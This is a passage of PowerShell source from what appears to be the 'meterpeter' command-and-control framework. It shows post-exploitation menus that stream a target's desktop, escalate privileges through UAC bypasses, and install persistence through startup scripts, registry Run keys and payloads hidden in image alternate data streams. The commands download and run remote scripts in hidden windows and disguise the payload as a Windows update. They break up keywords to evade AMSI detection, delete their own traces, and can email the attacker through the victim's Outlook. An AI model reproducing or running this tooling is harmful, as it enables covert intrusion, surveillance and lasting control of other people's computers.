If($Stream_choise -ieq \"Start\")\r\n         {\r\n\r\n            If(-not(Test-Path -Path \"$Env:ProgramFiles\\Mozilla 
Firefox\\firefox.exe\" -EA SilentlyContinue))\r\n            {\r\n               $Command = $Null;\r\n               Write-Host \"`n   abort: Stream target desktop function requires firefox.exe`n          Installed on attacker machine to access the stream.\" -ForegroundColor Red -BackgroundColor Black\r\n            }\r\n            Else\r\n            {\r\n               $BindPort = \"1234\"\r\n               write-host \" - Input execution time: \" -NoNewline\r\n               [int]$ExecTimmer = Read-Host\r\n               If($ExecTimmer -lt 30 -or $ExecTimmer -eq $null)\r\n               {\r\n                  $ExecTimmer = \"30\"\r\n                  Write-Host \"   => Execution to small, defaulting to 30 seconds ..\" -ForegroundColor Red\r\n                  Start-Sleep -Milliseconds 500\r\n               }\r\n               write-host \" - Input target ip addr: \" -ForeGroundColor Red -NoNewline\r\n               $RemoteHost = Read-Host\r\n               Write-Host \" * Streaming -[ $RemoteHost ]- Desktop Live!\" -ForegroundColor Green\r\n               If(-not($RemoteHost) -or $RemoteHost -eq $null)\r\n               {\r\n                  $RemoteHost = \"$Local_Host\" #Run stream againts our selft since none ip as inputed!\r\n               }\r\n\r\n               #Build output DataTable!\r\n               $StreamTable = New-Object System.Data.DataTable\r\n               $StreamTable.Columns.Add(\"local_host\")|Out-Null\r\n               $StreamTable.Columns.Add(\"remote_host\")|Out-Null\r\n               $StreamTable.Columns.Add(\"bind_port\")|Out-Null\r\n               $StreamTable.Columns.Add(\"connection\")|Out-Null\r\n               $StreamTable.Columns.Add(\"execution \")|Out-Null\r\n\r\n               #Adding values to output DataTable!\r\n               $StreamTable.Rows.Add(\"$Local_Host\",\"$RemoteHost\",\"$BindPort\",\"Bind\",\"$ExecTimmer seconds\")|Out-Null\r\n\r\n               #Diplay output DataTable!\r\n               Write-Host 
\"`n\";Start-Sleep -Milliseconds 500\r\n               $StreamTable | Format-Table -AutoSize | Out-String -Stream | Select-Object -Skip 1 |\r\n               Select-Object -SkipLast 1 | ForEach-Object {\r\n                  $stringformat = If($_ -Match '^(local_host)'){\r\n                     @{ 'ForegroundColor' = 'Green' } }Else{ @{} }\r\n                  Write-Host @stringformat $_\r\n               }\r\n               \r\n               <#\r\n               .SYNOPSIS\r\n                  Author: @r00t-3xp10it\r\n                  Helper - Stream Target Desktop (MJPEG)\r\n\r\n               .NOTES\r\n                  The next cmdline downloads\\imports 'Stream-TargetDesktop.ps1' into %TMP%,\r\n                  Import module, creates trigger.ps1 script to execute 'TargetScreen -Bind'\r\n                  sleeps for sellected amount of time (ExecTimmer), before stoping stream,\r\n                  and deleting all artifacts left behind by this function.\r\n               #>\r\n\r\n               #Anwsome Banner\r\n               $AnwsomeBanner = @\"\r\n                  '-.\r\n                     '-. _____    \r\n              .-._      |     '.  \r\n             :  ..      
|      :  \r\n             '-._'      |    .-'\r\n              /  \\     .'i--i\r\n             /    \\ .-'_/____\\___\r\n                 .-'  :          :Stream_Desktop_Live ..\r\n---------------------------------------------------------------------\r\n\"@;Write-Host $AnwsomeBanner\r\n               Write-Host \"* Start firefox on: '\" -ForegroundColor Red -BackgroundColor Black -NoNewline;\r\n               Write-host \"http://${RemoteHost}:${BindPort}\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\n               Write-host \"' to access live stream!\" -ForegroundColor Red -BackgroundColor Black;\r\n               $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/modules/Stream-TargetDesktop.ps1 -OutFile `$Env:TMP\\Stream-TargetDesktop.ps1|Out-Null;echo `\"Import-Module -Name `$Env:TMP\\Stream-TargetDesktop.ps1 -Force`\"|Out-File -FilePath `\"`$Env:TMP\\trigger.ps1`\" -Encoding ascii -Force;Add-Content `$Env:TMP\\trigger.ps1 `\"TargetScreen -Bind -Port $BindPort`\";Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File `$Env:TMP\\trigger.ps1`\"|Out-Null;Start-Sleep -Seconds $ExecTimmer;`$StreamPid = Get-Content -Path `\"`$Env:TMP\\mypid.log`\" -EA SilentlyContinue|Where-Object { `$_ -ne '' };Stop-Process -id `$StreamPid -EA SilentlyContinue -Force;Remove-Item -Path `$Env:TMP\\trigger.ps1 -Force;Remove-Item -Path `$Env:TMP\\mypid.log -Force;Remove-Item -Path `$Env:TMP\\Stream-TargetDesktop.ps1 -Force\";\r\n            }\r\n\r\n         }\r\n         If($Stream_choise -ieq \"Return\" -or $Stream_choise -ieq \"cls\" -or $Stream_choise -ieq \"modules\" -or $Stream_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $Delay_Time = $Null;\r\n            $Stream_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Escalate\")\r\n      {\r\n        write-host \"`n`n   Requirements:\" -ForegroundColor Yellow\r\n        write-host \" 
  EOP modules requires that attacker input the delay time (in seconds)\"\r\n        write-host \"   for client.ps1 to beacon home after the privilege escalation. Attacker\"\r\n        write-host \"   also needs to exit meterpeter connection and start a new listenner with\"\r\n        write-host \"   the same settings [LHOST+LPORT] to receive the elevated connection back.\"\r\n        write-host \"`n`n   Modules     Description                   Privileges Required\" -ForegroundColor green\r\n        write-host \"   -------     -----------                   ------------------\"\r\n        write-host \"   getadmin    Escalate client privileges    UserLand\"\r\n        write-host \"   Delete      Delete getadmin artifacts     UserLand\"\r\n        write-host \"   UACpriv     use runa[s] to spawn UAC diag UserLand\"\r\n        write-host \"   CmdLine     Uac execute command elevated  UserLand\"\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow\r\n        write-host \"`n`n :meterpeter:Post:Escalate> \" -NoNewline -ForeGroundColor Green\r\n        $Escal_choise = Read-Host;\r\n        If($Escal_choise -ieq \"UACpriv\")\r\n        {\r\n           $CurrentTime = (Get-Date -Format 'HH:mm')\r\n           write-host \" - Input time to start eop (\" -ForeGroundColor Red -NoNewline\r\n           write-host \"$CurrentTime\" -ForeGroundColor Yellow -NoNewline\r\n           write-host \"): \" -ForeGroundColor Red -NoNewline\r\n\r\n           $StartTime = Read-Host\r\n           If(-not($StartTime -match '^(\\d+\\d+:+\\d+\\d)$'))\r\n           {\r\n              write-host \"   => Error: wrong time format [$StarTime]\" -ForegroundColor Red\r\n              $Command = $null\r\n           }\r\n           Else\r\n           {\r\n              write-host \" * Using RU`NAS to elevate session!`n\" -ForeGroundColor Green\r\n              $Command = \"cd `$Env:TMP;`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match 
`\"S-1-5-32-544`\");If(`$bool){echo `\"   `> Error: Abort, session allready running under Administrator token ..`\" `> `$Env:TMP\\EOPsettings.log;Get-Content `$Env:TMP\\EOPsettings.log;Remove-Item -Path `$Env:TMP\\EOPsettings.log -Force}Else{Remove-Item -Path `$Env:TMP\\Programdata.log -force;iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/UACeop.ps1 -OutFile `$Env:TMP\\UACeop.ps1|Unblock-File;echo `\"   `> Triger EOP function at: $StartTime hours.`\" `> `$Env:TMP\\EOPsettings.log;echo `\"   Exit meterpeter connection [now] and start a new listenner`\" `>`> `$Env:TMP\\EOPsettings.log;echo `\"   Using the same LHOST+LPORT to recive the connection back.`\" `>`> `$Env:TMP\\EOPsettings.log;Get-Content `$Env:TMP\\EOPsettings.log;Remove-Item -Path `$Env:TMP\\EOPsettings.log -Force;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file UACeop.ps1 -starttime $StartTime -attacker ${Local_Host}:${Local_Port} -autodel`\"}\"\r\n           }\r\n        }\r\n        If($Escal_choise -ieq \"GetAdmin\")\r\n        {\r\n          write-host \" - Input execution delay time  : \" -ForeGroundColor Red -NoNewline\r\n          $DelayTime = Read-Host\r\n          write-host \" - Max EOP (client) executions : \" -NoNewline\r\n          $ExecRatLoop = Read-Host\r\n          write-host \" - Edit client location? 
(y|n) : \" -NoNewline\r\n          $EditRatLocation = Read-Host\r\n          If($EditRatLocation -iMatch '^(y|yes|s)$')\r\n          {\r\n             write-host \" - Input client remote location: \" -ForeGroundColor Red -NoNewline\r\n             $RatLocation = Read-Host\r\n             If(-not($RatLocation) -or $RatLocation -eq $null)\r\n             {\r\n                $RatStdOut = \"`$Env:TMP\\Update-KB5005101.ps1\"\r\n                $RatLocation = \"False\"\r\n             }\r\n             Else\r\n             {\r\n                $RatStdOut = \"$RatLocation\"            \r\n             }\r\n          }\r\n          Else\r\n          {\r\n             $RatStdOut = \"`$Env:TMP\\Update-KB5005101.ps1\"\r\n             $RatLocation = \"False\"\r\n          }\r\n\r\n          If(-not($DelayTime) -or $DelayTime -lt \"30\"){$DelayTime = \"30\"}\r\n          If(-not($ExecRatLoop) -or $ExecRatLoop -lt \"1\"){$ExecRatLoop = \"1\"}\r\n          Write-Host \" * Elevate session from UserLand to Administrator!\" -ForegroundColor Green\r\n          Write-Host \"   => Downloading: UACBy`passCMSTP from GitHub into %TMP% ..`n\" -ForeGroundColor Blue\r\n          Start-Sleep -Seconds 1\r\n\r\n          #Build output DataTable!\r\n          $mytable = New-Object System.Data.DataTable\r\n          $mytable.Columns.Add(\"max_executions\")|Out-Null\r\n          $mytable.Columns.Add(\"execution_delay\")|Out-Null\r\n          $mytable.Columns.Add(\"rat_remote_location\")|Out-Null\r\n\r\n          #Adding values to DataTable!\r\n          $mytable.Rows.Add(\"$ExecRatLoop\",        ## max eop executions\r\n                            \"$DelayTime seconds\",  ## Looop each <int> seconds\r\n                            \"$RatStdOut\"           ## rat client absoluct path\r\n          )|Out-Null\r\n\r\n          #Diplay output DataTable!\r\n          $mytable | Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 1 | ForEach-Object {\r\n             $stringformat = 
If($_ -Match '^(max_executions)'){\r\n                @{ 'ForegroundColor' = 'Green' } }Else{ @{} }\r\n             Write-Host @stringformat $_\r\n          }\r\n\r\n          #Anwsome Banner\r\n          $AnwsomeBanner = @\"\r\n                             ____\r\n                     __,-~~/~    `---.\r\n                   _/_,---(      ,    )\r\n               __ /        <    /   )  \\___\r\n- ------===;;;'====------------------===;;;===--------  -\r\n                  \\/  ~\"~\"~\"~\"~\"~\\~\"~)~\"/\r\n                  (_ (   \\  (     >    \\)\r\n                   \\_( _ <         >_>'\r\n                      ~ `-i' ::>|--\"\r\n                          I;|.|.|\r\n                         <|i::|i|`.\r\n                        (` ^'\"`-' \") CMSTP EOP\r\n--------------------------------------------------------------------------\r\n\"@;Write-Host $AnwsomeBanner\r\n          Write-Host \"* Exit *Meterpeter* and start a new Handler to recive the elevated shell..\" -ForegroundColor Red -BackgroundColor Black\r\n          Write-Host \"  => _EOP_ shell settings: lhost:\" -ForegroundColor Red -BackgroundColor Black -NoNewline;\r\n          Write-Host \"$Local_Host\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\n          Write-Host \" lport:\" -ForegroundColor Red -BackgroundColor Black -NoNewline;\r\n          Write-Host \"$Local_Port\" -ForegroundColor Green -BackgroundColor Black -NoNewline;\r\n          Write-Host \" obfuscat`ion:bxor\" -ForegroundColor Red -BackgroundColor Black;\r\n\r\n          #Execute Command Remote\r\n          Start-Sleep -Seconds 1;$TriggerSettings = \"$Local_Host\"+\":\"+\"$Local_Port\" -join ''\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\"`n`> Error: Abort, session allready running under Administrator token ..`\" `> `$Env:TMP\\EOPsettings.log;Get-Content `$Env:TMP\\EOPsettings.log;Remove-Item -Path 
`$Env:TMP\\EOPsettings.log -Force;}Else{echo `\"$TriggerSettings`\" `> `$Env:TMP\\EOPsettings.log;iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/CMSTPTrigger.ps1 -OutFile `$Env:TMP\\CMSTPTrigger.ps1|Out-Null;Start-Process -WindowStyle hidden powershell.exe -ArgumentList `\"-File `$Env:TMP\\CMSTPTrigger.ps1 -DelayTime $DelayTime -LoopFor $ExecRatLoop -RatLocation $RatLocation`\"}\"\r\n        }\r\n        If($Escal_choise -ieq \"Delete\" -or $Escal_choise -ieq \"del\")\r\n        {\r\n          Write-Host \" Delete privil`ege escalation artifacts left behind.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n\";\r\n          $Command = \"Stop-Process -Name cmstp -EA SilentlyContinue;Remove-Item -Path `\"`$Env:TMP\\*`\" -Include *.log,*.ps1,*.dll,*.inf,*.bat,*.vbs -Exclude *Update-* -EA SilentlyContinue -Force|Select -SkipLast 1;echo `\"   [i] meterpeter EOP artifacts successfuly deleted.`\" `> logme.log;Get-Content logme.log;Remove-Item -Path logme.log\";\r\n        }\r\n        If($Escal_choise -ieq \"CmdLine\")\r\n        {\r\n           Write-Host \" * Spawn UAC gui to run cmdline elevated.\" -ForegroundColor Green\r\n           write-host \" - Input cmdline to run elevated: \" -ForeGroundColor Red -NoNewline\r\n           $ElevatedCmdLine = Read-Host\r\n           $Myrunes = \"r\" + \"una\" + \"s\" -join ''\r\n           $Command = \"powershell -C `\"Start-Process $Env:WINDIR\\system32\\cmd.exe -ArgumentList '$ElevatedCmdLine' -verb $Myrunes`\";echo `\"`n[i] Executing: '$ElevatedCmdLine'`\" `> `$Env:TMP\\sdhsdc.log;Get-Content `$Env:TMP\\sdhsdc.log;Remove-Item -Path `\"`$Env:TMP\\sdhsdc.log`\" -Force\"\r\n        }\r\n        If($Escal_choise -ieq \"Return\" -or $Escal_choise -ieq \"cls\" -or $Escal_choise -ieq \"modules\" -or $Escal_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $Delay_Time = $Null;\r\n          $Escal_choise = $Null;\r\n          
$trigger_File = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"Persist\" -or $choise -ieq \"persistance\")\r\n      {\r\n        write-host \"`n`n   Requirements:\" -ForegroundColor Yellow;\r\n        write-host \"   Client (pay`load) must be deployed in target %TEMP% folder.\";\r\n        write-host \"   Meterpeter C2 must be put in listener mode (using same lhost|lport), and\";\r\n        write-host \"   Target machine needs to restart (startup) to beacon home at sellected time.\" -ForegroundColor Yellow;\r\n        write-host \"`n`n   Modules   Description                     Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                     ------------------\";\r\n        write-host \"   Beacon\" -ForegroundColor Green -NoNewline\r\n        write-host \"    Persiste Client using Startup   UserLand\";\r\n        write-host \"   ADSRUN    Persiste Client using A.D.S.    UserLand\";\r\n        write-host \"   RUNONCE   Persiste Client using REG:HKCU  UserLand\";\r\n        write-host \"   REGRUN    Persiste Client using REG:HKLM  \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red\r\n        write-host \"   Schtasks  Persiste Client using Schtasks  \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red\r\n        write-host \"   WinLogon  Persiste Client using WinLogon  \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Persistance> \" -NoNewline -ForeGroundColor Green;\r\n        $startup_choise = Read-Host;\r\n        If($startup_choise -ieq \"Beacon\")\r\n        {\r\n          $dat = Get-Date;\r\n          $BeaconTime = $Null;\r\n          $logfile = \"$IPATH\"+\"beacon.log\";\r\n\r\n          Write-host \" - Input Time (sec) to beacon home (eg: 60): \" -ForeGroundColor Red -NoNewline;\r\n          
$Delay_Time = Read-Host;\r\n          If(-not($Delay_Time) -or $Delay_Time -lt \"30\"){$Delay_Time = \"60\"}\r\n\r\n          Write-host \" - Use target OUTLOOK to send me msg (y|n) : \" -NoNewline;\r\n          $mSGmE = Read-Host;\r\n          If($mSGmE -iMatch '^(y|yes)$')\r\n          {\r\n             Write-host \" - Input Email Address to where send msg   : \" -ForeGroundColor Red -NoNewline;\r\n             $OutLokAddr = Read-Host;\r\n          }\r\n\r\n          $BeaconTime = \"$Delay_Time\"+\"000\";\r\n          write-host \" * Execute client ($payload_name.ps1) with $Delay_Time (sec) loop.\" -ForegroundColor Green\r\n          Start-Sleep -Seconds 1\r\n          Write-Host \"`n`n   Scripts               Remote Path\" -ForeGroundColor green;\r\n          Write-Host \"   -------               -----------\";\r\n          Write-Host \"   $payload_name.ps1  `$Env:TMP\\$payload_name.ps1\";\r\n          Write-Host \"   $payload_name.vbs  `$Env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs\" -ForegroundColor Green;\r\n          Write-Host \"   Persistence LogFile:  $logfile\" -ForeGroundColor yellow;\r\n          Write-Host \"   [i] On StartUp our client should beacon home from $Delay_Time to $Delay_Time seconds.`n\" -ForeGroundColor DarkGray;\r\n\r\n          If($mSGmE -iMatch '^(y|yes)$')\r\n          {\r\n             #Use Local OUTLOOK to send a message to attacker evertime the persistence.vbs its executed at startup ...\r\n             $Command = \"echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"powershell.exe -Win 1 cd `$Env:TMP;powershell.exe -Win 1 iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1 -OutFile ReadEmails.ps1`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run 
`\"powershell.exe -Win 1 cd `$Env:TMP;powershell.exe -Win 1 -File ReadEmails.ps1 -action Send -SendTo $OutLokAddr -SendSubject Meterpeter_C2_v2.10.11 -SendBody Meterpeter_C2_Have_beacon_home`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Do' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'wscript.sleep $BeaconTime' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"cmd.exe /R powershell.exe -Win 1 -File %tmp%\\$payload_name.ps1`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Loop' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo `\"   [i] Client $Payload_name.ps1 successful Persisted ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n          }\r\n          Else\r\n          {\r\n             $Command = \"echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Do' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'wscript.sleep $BeaconTime' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'objShell.Run `\"cmd.exe /R powershell.exe -Win 1 -File %tmp%\\$payload_name.ps1`\", 0, True' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo 'Loop' `>`> `\"`$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$payload_name.vbs`\";echo `\"   [i] Client $Payload_name.ps1 successful Persisted ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force\";                            \r\n          }\r\n\r\n          ## Writing persistence setting into beacon.log local file ..\r\n 
         echo \"\" >> $logfile\r\n          echo \"Persistence Settings\" >> $logfile;\r\n          echo \"--------------------\" >> $logfile;\r\n          echo \"DATE    : $dat\" >> $logfile;\r\n          echo \"RHOST   : $Remote_Host\" >> $logfile;\r\n          echo \"LHOST   : $Local_Host\" >> $logfile;\r\n          echo \"LPORT   : $Local_Port\" >> $logfile;\r\n          If($mSGmE -iMatch '^(y|yes)$')\r\n          {\r\n             echo \"OUTLOOK : $OutLokAddr\" >> $logfile;\r\n          }\r\n          echo \"\" >> $logfile;\r\n        }\r\n        If($startup_choise -ieq \"ADSRUN\" -or $startup_choise -ieq \"ADS\")\r\n        {\r\n           Write-Host \"`n`n   Description:\" -ForegroundColor Yellow\r\n           Write-Host \"   This module ask users to input the client.ps1 and one image.png absoluct\"\r\n           Write-Host \"   paths then the client.ps1 will be embbebed on image.png (ADS_`$DATA) and\"\r\n           Write-Host \"   a registry key (HKCU) is created to run image.png `$DATA on every startup.\"\r\n           Write-Host \"   Remark: This module only accepts [.bat|.txt|.ps1|.exe] pay`load file formats.\" -ForegroundColor Yellow\r\n           Write-Host \"   Remark: This module can be used to execute other scripts beside client.ps1`n\" -ForegroundColor Yellow\r\n           Write-host \" - Execute ADS:run module? 
(create|find|Clean)    : \" -ForeGroundColor DarkGray -NoNewline;\r\n           $Chosen_Option = Read-Host;\r\n\r\n           If($Chosen_Option -iMatch '^(create)$')\r\n           {\r\n              Write-host \" - Input 'Update-KB5005101.ps1' absoluct path     : \" -ForeGroundColor Red -NoNewline;\r\n              $Client_name = Read-Host;\r\n              Write-host \" - Input image(.png|.jpg|.jpeg) absoluct path     : \" -ForeGroundColor Red -NoNewline;\r\n              $Image_name = Read-Host;\r\n\r\n              If($Client_name -iMatch '\\\\' -and $Image_name -iMatch '\\\\')\r\n              {\r\n                 $RawImagePath = $Image_name.Split('\\\\')[-1]               # blitzo.png\r\n                 $RawPayloadPath = $Client_name.Split('\\\\')[-1]            # Update-KB5005101.ps1\r\n                 $LegitImage = $Image_name -replace \"\\\\${RawImagePath}\",\"\" # C:\\Users\\pedro\\Coding\\ADS_TUTORIAL\r\n\r\n                 Write-Host \" * Embebbed '$RawPayloadPath' on '$RawImagePath' (ADS)\" -ForegroundColor Green\r\n                 Write-Host \"   => '$RawImagePath' `$DATA will be executed at startup.\" -ForegroundColor Yellow\r\n                 Start-Sleep -Seconds 1\r\n\r\n                 ## Current Settings\r\n                 # RawImagePath   :  blitzo.png\r\n                 # RawPayloadPath :  Update-KB5005101.ps1\r\n                 # LegitImage     :  C:\\Users\\pedro\\Coding\\ADS_TUTORIAL\r\n                 # Image_name     :  C:\\Users\\pedro\\Coding\\ADS_TUTORIAL\\blitzo.png\r\n                 # Client_name    :  C:\\Users\\pedro\\AppData\\Local\\Temp\\Update-KB5005101.ps1\r\n                 ## ORIGINAL: $Command = \"echo `\"@echo off`\"|Out-File `\"${LegitImage}\\ZoneIdentifier.bat`\" -Encoding default -Force;Add-Content ${LegitImage}\\ZoneIdentifier.bat `\"powershell -WindowStyle hidden -File $Client_name`\" -Force;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile 
`\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"create`\" -streamdata `\"${LegitImage}\\ZoneIdentifier.bat`\" -intextfile `\"$Image_name`\" -registry `\"true`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n\r\n                 #BugReport: @Daniel_Durnea\r\n                 $Command = \"echo `\"@echo off`\"|Out-File `\"${LegitImage}\\ZoneIdentifier.bat`\" -Encoding default -Force;Add-Content ${LegitImage}\\ZoneIdentifier.bat `\"powershell -C Start-Process -WindowStyle hidden powershell -ArgumentList '-File REPL4CEM3'`\" -Force;((Get-Content -Path ${LegitImage}\\ZoneIdentifier.bat -Raw) -Replace `\"REPL4CEM3`\",`\"$Client_name`\")|Set-Content -Path ${LegitImage}\\ZoneIdentifier.bat -Force;iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"create`\" -streamdata `\"${LegitImage}\\ZoneIdentifier.bat`\" -intextfile `\"$Image_name`\" -registry `\"true`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n              }\r\n              Else\r\n              {\r\n                 $Command = $Null;\r\n                 $Chosen_Option = $Null;\r\n                 $startup_choise = $Null;\r\n                 Write-Host \"\"\r\n                 Write-Host \"[error] This module requires 'Absoluct Path' declarations ...\" -ForegroundColor Red -BackgroundColor Black\r\n                 Start-Sleep -Seconds 1\r\n              }\r\n           }\r\n           ElseIf($Chosen_Option -iMatch '^(find)$')\r\n           {\r\n              Write-host \" - The directory to start search for `$DATA stream : \" -ForeGroundColor Red -NoNewline;\r\n              $StartDir = Read-Host;           \r\n              \r\n              If(-not($StartDir) -or $StartDir -ieq $null){$StartDir = \"$Env:USERPROFILE\"}\r\n\r\n              Write-Host \" * Search in 
'$StartDir' for streams.\" -ForegroundColor Green\r\n              $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"enum`\" -streamdata `\"false`\" -StartDir `\"$StartDir`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n           }\r\n           ElseIf($Chosen_Option -iMatch '^(clean)$')\r\n           {\r\n              Write-host \" - Input 'payl`oad.extension' name (stream)        : \" -ForeGroundColor Red -NoNewline;\r\n              $streamdata = Read-Host;\r\n              Write-host \" - Input image(.png|.jpg|.jpeg) absoluct path     : \" -NoNewline;\r\n              $Image_name = Read-Host;$ParseThisShit = $Image_name.Split('\\\\')[-1]\r\n              If(-not($streamdata) -or $streamdata -ieq $null){$streamdata = \"ZoneIdentifier\"}\r\n\r\n              Write-Host \" * Delete '$ParseThisShit' ADS `$DATA Stream.\" -ForegroundColor Green\r\n              $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/AdsMasquerade.ps1`\" -OutFile `\"`$Env:TMP\\AdsMasquerade.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\AdsMasquerade.ps1 -ADS `\"clear`\" -streamdata `\"$streamdata`\" -intextfile `\"$Image_name`\";Remove-Item -Path `\"`$Env:TMP\\AdsMasquerade.ps1`\" -Force\";\r\n           }\r\n           Else\r\n           {\r\n              $Command = $Null;\r\n              $Chosen_Option = $Null;\r\n              $startup_choise = $Null;           \r\n           }\r\n\r\n        }\r\n        If($startup_choise -ieq \"RUNONCE\" -or $startup_choise -ieq \"once\")\r\n        {\r\n          ## If Available use power`shell -ve`rsio`n 2 {AM`SI Logging Evasion}\r\n          write-host \" * Execute Client ($payload_name.ps1) On Every StartUp.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n          Write-Host \"   Persist    
           Trigger Remote Path\" -ForeGroundColor green;\r\n          Write-Host \"   -------               -------------------\";\r\n          Write-Host \"   Update-KB5005101.ps1  `$env:tmp\\KBPersist.vbs`n\";\r\n          $Command = \"cmd /R REG ADD 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce' /v KBUpdate /d '%tmp%\\KBPersist.vbs' /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R PoWeRsHeLl -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs\";\r\n          $Command = ChkDskInternalFuncio(Char_Obf($Command));\r\n        }\r\n        If($startup_choise -ieq \"REGRUN\" -or $startup_choise -ieq \"run\")\r\n        {\r\n          ## If Available use po`wershell -versi`on 2 {AM`SI Logging Evasion}\r\n          write-host \" * Execute Client ($payload_name.ps1) On Every StartUp.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"`n`n\";\r\n          Write-Host \"   Persist               Trigger Remote Path\" -ForeGroundColor green;\r\n          Write-Host \"   -------               -------------------\";\r\n          Write-Host \"   Update-KB5005101.ps1  `$env:tmp\\KBPersist.vbs`n\";\r\n          $myVer = \"PoWe\" + \"RsHeLl -ve\" + \"rsion 2\" -join ''\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 `> test.log;If(Get-Content test.log|Select-String `\"Enabled`\"){cmd /R reg add 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' /v KBUpdate /d %tmp%\\KBPersist.vbs /t REG_EXPAND_SZ /f;echo 'Set objShell = WScript.CreateObject(`\"WScript.Shell`\")' `> `$env:tmp\\KBPersist.vbs;echo 'objShell.Run `\"cmd /R $myVer -Win 1 -File `$env:tmp\\$Payload_name.ps1`\", 0, True' `>`> `$env:tmp\\KBPersist.vbs;remove-Item test.log -Force}else{cmd /R reg add 
